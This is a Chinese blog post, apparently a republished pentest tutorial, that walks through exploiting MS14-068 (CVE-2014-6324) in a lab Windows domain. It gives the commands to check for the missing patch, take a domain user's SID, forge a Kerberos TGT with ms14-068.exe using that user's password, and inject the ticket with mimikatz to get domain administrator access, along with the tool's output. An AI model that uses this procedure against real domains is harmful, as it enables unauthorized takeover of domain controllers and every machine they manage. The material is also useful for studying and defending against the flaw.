博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
域***提权之MS14-068
阅读量:5849 次
发布时间:2019-06-19

本文共 2051 字,大约阅读时间需要 6 分钟。

0x00 前言


在做***测试时,当遇到域环境,获取到一个域成员账号后,如果域控制器未打好补丁,则可以利用本文所提到的漏洞,快速获取到域控制器权限。笔者这里总结网上已有资料,加以描述,希望你能在实际测试中派上用场。

0x01 准备工作


  1. 域成员账号及密码一个
  2. mimikatz
  3. ms14-068.exe
  4. 03以上服务器或pc

0x02 模拟环境


域控制器 2008r2 dc.test.com 192.168.3.100

域内机器 2008r2 client.test.com 192.168.3.10

0x03 漏洞自检


MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测

systeminfo |find "3011780"

域***提权之MS14-068

为空则代表没有打该补丁,存在漏洞!

如果属于黑盒测试,并没有直接操作域控制器的权限,那么只能使用该漏洞,看是否能成功伪造域管理员登录来验证

0x04 漏洞利用


1. 获取域成员sid

获取域成员sid的方式有多种,当然前提是建立在0x01上,本次使用最为简单的命令获取

whoami /all  #该命令获取当前登录用户的信息,这里使用的是域成员登录,所以获取到的是域成员normal的sid

域***提权之MS14-068

2. 生成TGT票据

使用ms14-068.exe,网上有多种版本,有python脚本(需要在***机上安装python2.x版本,略麻烦),也有已经从python转exe的版本,不需要依赖python环境,下载地址:

C:\Users\normal\Desktop>MS14-068.exeUSAGE:MS14-068.exe -u 
@
-s
-d
OPTIONS: -p
--rc4
C:\Users\normal\Desktop>MS14-068.exe -u normal@test.com -s S-1-5-21-1406004368-3818689962-3591297438-1105 -d 192.168.3.100 -p Server1 [+] Building AS-REQ for 192.168.3.100... Done! [+] Sending AS-REQ to 192.168.3.100... Done! [+] Receiving AS-REP from 192.168.3.100... Done! [+] Parsing AS-REP from 192.168.3.100... Done! [+] Building TGS-REQ for 192.168.3.100... Done! [+] Sending TGS-REQ to 192.168.3.100... Done! [+] Receiving TGS-REP from 192.168.3.100... Done! [+] Parsing TGS-REP from 192.168.3.100... Done! [+] Creating ccache file 'TGT_normal@test.com.ccache'... Done!使用方法:ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

如果操作正确,且域机器是可以和域控制器互通则会创建.ccache文件

域***提权之MS14-068
域成员密码错误情况图

3. 票据注入

使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器

mimikatz # kerberos::purge      //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造mimikatz # kerberos::list          //查看当前机器凭证mimikatz # kerberos::ptc 票据文件         //将票据注入到内存中

域***提权之MS14-068

当显示injecting ticket ok时,表示已经成功将票据注入到内存中,可在机器中用klist查看
域***提权之MS14-068

4.测试

伪造后,进行尝试访问域控制器

域***提权之MS14-068

注入票据前是不能访问的

域***提权之MS14-068

0x05 细节


  1. 注入票据时,机器不能是03或xp,因为mimikatz不支持这两个机器注入,听大佬说过有工具可以注入,希望有知道的朋友可以留言

    域***提权之MS14-068

  2. 当获取到域用户、域用户sid、密码以及可访问到域控制器的机器,并不需要机器一定在域中(如***者通过***等拨入内网),但需要把dns指向域控制器才能解析
  3. 访问域控制器时,需要使用主机名,不能使用ip
    域***提权之MS14-068
  4. 如有错误,请指正,万分感谢

转载于:https://blog.51cto.com/z2ppp/2060051

你可能感兴趣的文章
linux查看系统版本(32位/64位)的方法
查看>>
Highcharts中Legend动态显示点值
查看>>
MySQL数据库主从同步(单台2实例)
查看>>
HashMap和HashTable简介和区别
查看>>
java json 库之 jackson
查看>>
【图像缩放】最邻近插值
查看>>
阿里数据中台七年演化史——行在口述干货
查看>>
10.Java异常问题
查看>>
利用Git Webhooks实现jekyll博客自动化部署
查看>>
Fescar undoExecutor介绍
查看>>
Linux命令操作大全
查看>>
从周五开始香港主机特别慢,香港主机用户有同感吗?
查看>>
Ember.js 3.9.0-beta.3 发布,JavaScript Web 应用开发框架
查看>>
python标准库00 学习准备
查看>>
4.2. PHP crypt()
查看>>
commonservice-config配置服务搭建
查看>>
连接池的意义及阿里Druid
查看>>
ComponentOne 2019V1火热来袭!全面支持 Visual Studio 2019——亮点之WinForm篇
查看>>
Python递归函数与匿名函数
查看>>
loadrunner安装运行一步一步来(多图)
查看>>